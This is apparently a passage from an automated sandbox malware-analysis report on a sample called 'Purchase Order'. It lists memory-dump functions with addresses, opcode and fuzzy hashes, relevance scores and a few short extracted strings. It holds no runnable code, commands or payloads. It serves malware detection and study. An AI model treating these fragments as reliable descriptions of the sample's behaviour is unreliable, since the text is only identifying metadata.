                                                                                                            • Source File: 00000002.00000002.4124412884.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_1660000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d0e27d67378288f6bf5b6418e43b488f5ebf8af7c0daa9cf71913eecf4d92087
                                                                                                            • Instruction ID: c758d782251ade0d6edb53adfaa0afea1d8daa3ca62e40e5cb0b93472df8d73f
                                                                                                            • Opcode Fuzzy Hash: d0e27d67378288f6bf5b6418e43b488f5ebf8af7c0daa9cf71913eecf4d92087
                                                                                                            • Instruction Fuzzy Hash: 43E092319202669FCB01EBA4EC454DEFB74AEC6310B154666D810B7155EB302729C761
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 01662078 Relevance: .0, Instructions: 19COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4124412884.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_1660000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 25cc931afa7a52401ca3333666ec3f59ad03d917dee911704cae1b9583c5186a
                                                                                                            • Instruction ID: eef81e55a18710681684a9a98b29a2baeac054be9c35fad894fcd2d0b64e3e16
                                                                                                            • Opcode Fuzzy Hash: 25cc931afa7a52401ca3333666ec3f59ad03d917dee911704cae1b9583c5186a
                                                                                                            • Instruction Fuzzy Hash: 76D05B35D2022B97CB01E7A5EC044DFF738EED6261B544626D91437154FB702659C6F1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 016682B8 Relevance: .0, Instructions: 18COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4124412884.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_1660000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                                            • Instruction ID: a2245728cf83cf76cd55d11fa1cb6172df6ba20ed2695d339bfd399204cd2bf1
                                                                                                            • Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                                            • Instruction Fuzzy Hash: 1AC08C7320C6282AA235509E7C40EE3BB8CC3C13B4A210137FA1CE3302A8429C8101F4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0166A76D Relevance: .0, Instructions: 16COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4124412884.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_1660000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3f3c2073c8fc789d6beff12a7c421ceae5a5849ac1bc12aae223d7ea5c91895e
                                                                                                            • Instruction ID: d6fec51d833f925360005bf542a1e82722b2b210de1bb9f43c4228d35d7ee803
                                                                                                            • Opcode Fuzzy Hash: 3f3c2073c8fc789d6beff12a7c421ceae5a5849ac1bc12aae223d7ea5c91895e
                                                                                                            • Instruction Fuzzy Hash: 6DD0677AB410189FCF049F98E8808DDB7B6FB9C221B048156EA15A7265C6319921DB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 01665F00 Relevance: .0, Instructions: 14COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4124412884.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_1660000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 41716dc03aed2ee9e69502ae2647e937c47dc120efd526e251129f4c6526cde8
                                                                                                            • Instruction ID: 5a6f24f0e54226093306c6595629ebd63abfc9873afad8c78d526a72ae0444a7
                                                                                                            • Opcode Fuzzy Hash: 41716dc03aed2ee9e69502ae2647e937c47dc120efd526e251129f4c6526cde8
                                                                                                            • Instruction Fuzzy Hash: 3AD02EB06083824FC606F338FA5A4443BB2EAC0204B44989EA8088A82BED781C8D4322
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 01665F10 Relevance: .0, Instructions: 12COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4124412884.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_1660000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 917da85ad0e05acbb9a05b83ff8cb39bc35440bb5f084e49d94f378dbf072bff
                                                                                                            • Instruction ID: 44a9c59453552e6a0402c779c74b4dfb196f4ca3bebfdfd9779575d1e86d36d7
                                                                                                            • Opcode Fuzzy Hash: 917da85ad0e05acbb9a05b83ff8cb39bc35440bb5f084e49d94f378dbf072bff
                                                                                                            • Instruction Fuzzy Hash: 8CC0127030430A4BC505F779F98995537AAF7C0200F406955B4090611ADE7C2CC45692
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Non-executed Functions

                                                                                                            Function 06E92807 Relevance: 14.1, Strings: 11, Instructions: 387COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4128089200.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6e90000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: "$0omp$Hjq$PHfq$PHfq$PHfq$PHfq$PHfq$PHfq$PHfq$PHfq
                                                                                                            • API String ID: 0-3533979995
                                                                                                            • Opcode ID: 69e501787d9eaa14a273ae143eec0f70b69907db9e2a9a980f2f1841221b82d6
                                                                                                            • Instruction ID: 19fe6a85c9b90afd631dd348236f47209462495871aff071701e81b973f6b5fb
                                                                                                            • Opcode Fuzzy Hash: 69e501787d9eaa14a273ae143eec0f70b69907db9e2a9a980f2f1841221b82d6
                                                                                                            • Instruction Fuzzy Hash: 7C12C2B4E012188FDB58DFA9D984B9DBBF2BF89300F1080A9D509AB394DB755E85DF10
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0166E310 Relevance: 1.8, Strings: 1, Instructions: 596COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4124412884.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_1660000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: .5~q
                                                                                                            • API String ID: 0-3585553848
                                                                                                            • Opcode ID: 924c5b50ea4cf6a452c8cd64d27bd0b8e2687dd0701c93477dd8d52ef1f04913
                                                                                                            • Instruction ID: 63f648d61ab5bfc404f7285dd2f6fcfa3c74d92a53c6df7e08da008638a03576
                                                                                                            • Opcode Fuzzy Hash: 924c5b50ea4cf6a452c8cd64d27bd0b8e2687dd0701c93477dd8d52ef1f04913
                                                                                                            • Instruction Fuzzy Hash: 39529D74E01229CFDB64DF69D984B9DBBB2BB89300F1081EAD509A7354DB35AE81CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06E933B8 Relevance: 1.5, Strings: 1, Instructions: 222COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4128089200.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6e90000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 0omp
                                                                                                            • API String ID: 0-313708406
                                                                                                            • Opcode ID: 4938d35127ef7565334755b3820c14154d04a9e297f7bf1764eeab18a78c12ed
                                                                                                            • Instruction ID: 4c652cf5a5a9d579981be0bf6c7d73b19ecb9d44373a75b3d8c7e1b9b231a01a
                                                                                                            • Opcode Fuzzy Hash: 4938d35127ef7565334755b3820c14154d04a9e297f7bf1764eeab18a78c12ed
                                                                                                            • Instruction Fuzzy Hash: DBB19574E10218CFDB54DFA9D984A9DBBB2FF89310F1081A9D919AB365DB30AD81CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06E933A8 Relevance: 1.4, Strings: 1, Instructions: 132COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4128089200.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6e90000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 0omp
                                                                                                            • API String ID: 0-313708406
                                                                                                            • Opcode ID: 7041ad6d27bdb75d32fc7dfd78d356b744a5ad5527d5b469358061b644a08fff
                                                                                                            • Instruction ID: d947454e6820ac5254cea9c3f3eff060b9d8d9c2a3b8151f5c03a97fb34b4782
                                                                                                            • Opcode Fuzzy Hash: 7041ad6d27bdb75d32fc7dfd78d356b744a5ad5527d5b469358061b644a08fff
                                                                                                            • Instruction Fuzzy Hash: 41518274E01608CFDB48DFAAD984A9DBBF2FF89300F249169D419AB365DB349942CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06E95EC8 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4128089200.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6e90000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 33e891abe64cb38352fe57e808ba2f7c9a1f05b1e0146bc720bb18558a6956fb
                                                                                                            • Instruction ID: 6a400d805b6622ddb23ad543c5271fabf5a5b73fa6da62860c2d9c4043b8ab31
                                                                                                            • Opcode Fuzzy Hash: 33e891abe64cb38352fe57e808ba2f7c9a1f05b1e0146bc720bb18558a6956fb
                                                                                                            • Instruction Fuzzy Hash: CFC1BF74E01218CFDB54DFA9D984B9DBBB2EF89304F2090AAD809AB355DB345E85CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06E95A70 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4128089200.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6e90000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4ccb4278d7bf32f3b31ef7a4db46b7f9a87bd80e794c547beb5439f3ebb0e56e
                                                                                                            • Instruction ID: a61722cdf815c09ac5282b0a2ee517a67055431adf059efee73df5f656cf305b
                                                                                                            • Opcode Fuzzy Hash: 4ccb4278d7bf32f3b31ef7a4db46b7f9a87bd80e794c547beb5439f3ebb0e56e
                                                                                                            • Instruction Fuzzy Hash: 19C1A074E01218CFDB54DFA9D984B9DBBB2EF89300F2090AAD409AB354DB355E85CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06E95618 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4128089200.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6e90000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8b049975d01a195bfddeb2de9ad5c0c1cdc18be2ecccce291ef00c316b530ec6
                                                                                                            • Instruction ID: ebeed12f9b3ff95918b4dd55d49e9b499a882627fa84a05b521fe723f749234d
                                                                                                            • Opcode Fuzzy Hash: 8b049975d01a195bfddeb2de9ad5c0c1cdc18be2ecccce291ef00c316b530ec6
                                                                                                            • Instruction Fuzzy Hash: D9C1BF74E01218CFDB54DFA9D984B9DBBB2EF89300F2090AAD809AB355DB745E81CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06E96BD0 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4128089200.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6e90000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5bb3d6b12fce39b85a1273af9ee5ecbf4d425f356ad48ac963df2dcf24296492
                                                                                                            • Instruction ID: 14bda6b9148d7a670e0a74f3f69c8c4b438c2e135df6af244456e15cb2d2087c
                                                                                                            • Opcode Fuzzy Hash: 5bb3d6b12fce39b85a1273af9ee5ecbf4d425f356ad48ac963df2dcf24296492
                                                                                                            • Instruction Fuzzy Hash: 28C1A074E01218CFEB54DFA9D984B9DBBB2EF89304F2090AAD409AB354DB355E85CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06E96778 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4128089200.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6e90000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0d774f03e3c6e3ebec2a4ecf0841d1fdac81a435359da3b81136fc5d547abdd0
                                                                                                            • Instruction ID: 79434f1a5fdc03bf8d14f1067886d88d23100344e93e9a3de74b5dc1c6cfd0d2
                                                                                                            • Opcode Fuzzy Hash: 0d774f03e3c6e3ebec2a4ecf0841d1fdac81a435359da3b81136fc5d547abdd0
                                                                                                            • Instruction Fuzzy Hash: BBC1A074E01218CFEB54DFA9D984B9DBBB2EF89304F2090AAD409AB354DB345E85CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06E96320 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4128089200.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6e90000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: cb1ac500385673c28254c00f003427c3438bbd3284a1acf6d842e48a866e1446
                                                                                                            • Instruction ID: b12892b7b3d52626bee17bbb48bc0cb74195084bc3a117516a8982f2b0dd91ca
                                                                                                            • Opcode Fuzzy Hash: cb1ac500385673c28254c00f003427c3438bbd3284a1acf6d842e48a866e1446
                                                                                                            • Instruction Fuzzy Hash: BBC1AF74E01218CFEB54DFA9D994B9DBBB2EF89300F2090AAD409AB355DB345E85CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06E908F0 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4128089200.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6e90000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a5bfeaa46f763bfa82f8e7ae740f9edbcf9ab3bf240194a61433389fb1c81352
                                                                                                            • Instruction ID: 30c71c991ad49b15a96f6ac80b0d73d26cc8c230c143117cb581cf51b0e91202
                                                                                                            • Opcode Fuzzy Hash: a5bfeaa46f763bfa82f8e7ae740f9edbcf9ab3bf240194a61433389fb1c81352
                                                                                                            • Instruction Fuzzy Hash: 4BC1AE74E01218CFDB54DFA9D984B9DBBB2EF89304F2090AAD809AB355DB345E85CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06E974A8 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4128089200.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6e90000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: cac32f03930541231aa8ce74439f0531d92a54a21c9abc91aafeaf566ea9671c
                                                                                                            • Instruction ID: 2202cc22f3ac4bae72e79d815f07984d30d88a0de90cdc8a44667c1c0b1076af
                                                                                                            • Opcode Fuzzy Hash: cac32f03930541231aa8ce74439f0531d92a54a21c9abc91aafeaf566ea9671c
                                                                                                            • Instruction Fuzzy Hash: AEC1AF74E01218CFDB54DFA9D984B9DBBB2EF89300F2090AAD809AB355DB345E85CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06E90498 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4128089200.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6e90000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 104413803947eaee37ba11e5dba1359bc8793f5e7244cc0a49f52600eb92816d
                                                                                                            • Instruction ID: d6c94cbd54ea097ff6b3e8de3e5afed9a1bc7c3071ae9bf40d1812109a9f2106
                                                                                                            • Opcode Fuzzy Hash: 104413803947eaee37ba11e5dba1359bc8793f5e7244cc0a49f52600eb92816d
                                                                                                            • Instruction Fuzzy Hash: A2C1A074E01218CFDB54DFA9D984B9DBBB2EF89300F2090AAD409AB355DB355E85CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06E90040 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4128089200.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6e90000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 45112e804c8c3d0d5b239119743f2d601ebdd3be1bf3c120e2c7cd76b360eb8b
                                                                                                            • Instruction ID: 769fbdcb7f95c32e53d7128142447f53e90bbc20e67bc529b642a7769299c0c9
                                                                                                            • Opcode Fuzzy Hash: 45112e804c8c3d0d5b239119743f2d601ebdd3be1bf3c120e2c7cd76b360eb8b
                                                                                                            • Instruction Fuzzy Hash: A7C1AF74E01218CFDB54DFA9D984B9DBBB2EF89300F2090AAD809AB355DB345E85CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06E97050 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4128089200.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6e90000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f4139e7b0b7034e9511806d15b9fd9945715127c613e4cc71341543d9e310696
                                                                                                            • Instruction ID: 21bcd51ea3d523dd6a732b6bcafc31252f6b606d29566069a14e8f13a66c6ff9
                                                                                                            • Opcode Fuzzy Hash: f4139e7b0b7034e9511806d15b9fd9945715127c613e4cc71341543d9e310696
                                                                                                            • Instruction Fuzzy Hash: 8BC1AF74E01218CFDB54DFA9D984B9DBBB2EF89304F2090AAD809AB355DB345E85CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06E981B0 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4128089200.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6e90000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 132c214e0c8e90df3ec276b6241f1c6e9cdbcd7f8b975390672c834f6bfbc2bb
                                                                                                            • Instruction ID: f3b447c93d23fd27f82be85a6b6fe6bf5d0f426506593af321636662579a00d6
                                                                                                            • Opcode Fuzzy Hash: 132c214e0c8e90df3ec276b6241f1c6e9cdbcd7f8b975390672c834f6bfbc2bb
                                                                                                            • Instruction Fuzzy Hash: A2C19074E01218CFDB54DFA9D994B9DBBB2EF89300F2090AAD409AB364DB355E85CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06E95198 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4128089200.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6e90000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: dfe7d4694885c4e768d8d75cb6ea11fc4fafbaa0b64f25cd06ae5f1a97351993
                                                                                                            • Instruction ID: 5336dd974e3587c79b883d706239e483713b1e929f22c270dc8f14069e8ae2a9
                                                                                                            • Opcode Fuzzy Hash: dfe7d4694885c4e768d8d75cb6ea11fc4fafbaa0b64f25cd06ae5f1a97351993
                                                                                                            • Instruction Fuzzy Hash: 4AC1AF74E01218CFDB54DFA9D984B9DBBB2EF89300F2090AAD409AB365DB355E85CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06E90D48 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4128089200.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6e90000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f2dbcd5758759e68a2af96c3f4d10bd100ccc7672d12f7f58030e3e1965d6ba8
                                                                                                            • Instruction ID: 3824bbb26b2c9b5eca08b2dd96e88d2804cf4935914d16a688c70f870ed6d457
                                                                                                            • Opcode Fuzzy Hash: f2dbcd5758759e68a2af96c3f4d10bd100ccc7672d12f7f58030e3e1965d6ba8
                                                                                                            • Instruction Fuzzy Hash: 29C1AF74E01218CFDB54DFA9D984B9DBBB2EF89304F2090AAD809AB354DB355E85CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06E97D58 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4128089200.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6e90000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 2410d052e7c3551445517c37d786932686ddfd2c761c3753303855cf4756c353
                                                                                                            • Instruction ID: 86c2b69b61eeb79ed34a8cf2846c31c0dfeed8c44c76b921e517ece107626a00
                                                                                                            • Opcode Fuzzy Hash: 2410d052e7c3551445517c37d786932686ddfd2c761c3753303855cf4756c353
                                                                                                            • Instruction Fuzzy Hash: AAC1A074E01218CFDB54DFA9D984B9DBBB2EF89304F2090AAD409AB364DB345E85CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06E97900 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4128089200.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6e90000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4dd9c0e6ab26cd966c049351856b39323ed0feb6b6ff1baa1fd05c935638f419
                                                                                                            • Instruction ID: 50b7b5da40b844dedc3848ffa3ee702acfb469aa6194a9a1b84291b0b26be509
                                                                                                            • Opcode Fuzzy Hash: 4dd9c0e6ab26cd966c049351856b39323ed0feb6b6ff1baa1fd05c935638f419
                                                                                                            • Instruction Fuzzy Hash: 78C19F74E01218CFDB54DFA9D984B9DBBB2EF89300F2090AAD809AB354DB345E85CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05DBD5C0 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4127452852.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_5db0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3888c969d4fc35f9d3cba7926f9cca57508ba63d6037ac1334399e164dc452e6
                                                                                                            • Instruction ID: e46f08ace7f87a659523f5c66b2fd0f76c3d8efa860b2f012368ba4470fd0cd0
                                                                                                            • Opcode Fuzzy Hash: 3888c969d4fc35f9d3cba7926f9cca57508ba63d6037ac1334399e164dc452e6
                                                                                                            • Instruction Fuzzy Hash: 32C18E74E01218CFDB14DFA9D984B9DBBB2AF89300F2080AAD409AB355DB759E85CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05DBD168 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
